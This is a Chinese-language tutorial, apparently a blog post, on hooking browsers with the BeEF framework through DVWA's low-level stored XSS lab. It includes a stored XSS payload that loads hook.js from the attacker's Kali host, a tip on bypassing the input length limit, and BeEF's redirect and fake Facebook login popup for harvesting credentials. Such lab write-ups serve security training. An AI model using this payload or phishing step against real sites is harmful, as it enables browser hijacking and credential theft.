DVWA-XSS(Stored)-beef

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

bash 复制代码
apt install beef-xss

使用

bash 复制代码
beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面

beef连接

拿Low Level 的xss漏洞测试

beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。

输入666<script src="http://192.168.20.145:3000/hook.js"></script>

前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。

当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)

beef功能

Details:受害者浏览器信息

Logs:记录浏览器操作记录

Commands:向受害者发送指令的模块

下面记录几个功能

  1. 页面重定向

    选中Redirect Browser模块,右侧输入想要跳转到的网址

  2. 弹窗

    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。

    弹窗,输入账号密码。

    在beef的history处可以查看账号密码。

相关推荐
携欢3 天前
PortSwigger靶场之Stored DOM XSS通关秘籍
前端·xss
练习时长一年4 天前
后端接口防止XSS漏洞攻击
前端·xss
携欢5 天前
PortSwigger靶场之DOM XSS in jQuery selector sink using a hashchange event通关秘籍
前端·jquery·xss
在安全厂商修设备5 天前
XSS 跨站脚本攻击剖析与防御 - 第一章:XSS 初探
web安全·网络安全·xss
普通网友6 天前
前端安全攻防:XSS, CSRF 等防范与检测
前端·安全·xss
携欢6 天前
PortSwigger靶场之Reflected XSS into attribute with angle brackets HTML-encoded通关秘籍
前端·xss
W-GEO6 天前
前端安全攻防:XSS, CSRF 等常见威胁的防范与检测指南
前端·安全·xss
yenggd8 天前
3种XSS攻击简单案例
前端·xss
盖头盖8 天前
【xss基本介绍】
前端·xss
mooyuan天天10 天前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场